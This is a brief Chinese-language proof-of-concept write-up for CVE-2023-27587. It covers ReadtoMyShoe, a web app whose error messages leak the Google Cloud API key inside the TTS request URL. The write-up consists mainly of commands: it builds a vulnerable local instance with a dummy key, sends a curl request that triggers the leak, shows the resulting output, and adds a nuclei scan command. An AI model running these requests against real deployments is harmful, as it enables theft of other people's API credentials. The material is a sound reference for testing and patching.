CVE-2023-27587 的简单 PoC
ReadtoMyShoe (RTMS) 是一个 Web 应用程序(使用 Rust、Yew 和 Axum),允许你上传文章(通过 URL 或直接粘贴),稍后收听。
如果添加文章时发生错误,网站会向用户显示错误消息。如果错误源自 Google Cloud TTS 请求,那么它将包含请求的完整 URL。该请求 URL 包含 Google Cloud API 密钥。
$ git clone https://github.com/rozbb/readtomyshoe.git
$ cd readtomyshoe && git checkout v0.2.0
$ echo "GCP_KEY_LEAKED_TEST" > server/gcp_api.key
$ DOCKER_BUILDKIT=1 docker build -t readtomyshoe-vul .
$ docker run -p 9382:9382 readtomyshoe-vul
密钥仅在 GCP 调用发生错误时暴露!
curl 'http://192.168.15.201:9382/api/add-article-by-text' -X POST \
-H 'Accept-Encoding: gzip, deflate' \
-H 'content-type: application/json' \
--data-raw '{"title":"Kernsicherheitstest","body":"Kernsicherheitstest"}'
TTS failed: TTS request failed
Caused by:
HTTP status client error (400 Bad Request) for url (https://texttospeech.googleapis.com/v1beta1/text:synthesize?key=GCP_KEY_LEAKED_TEST%0A)

https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2023/CVE-2023-27587.yaml
$ nuclei -t cves/2023/CVE-2023-27587.yaml -u http://<host>

https://github.com/rozbb/readtomyshoe/security/advisories/GHSA-23g5-r34j-mr8g
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27587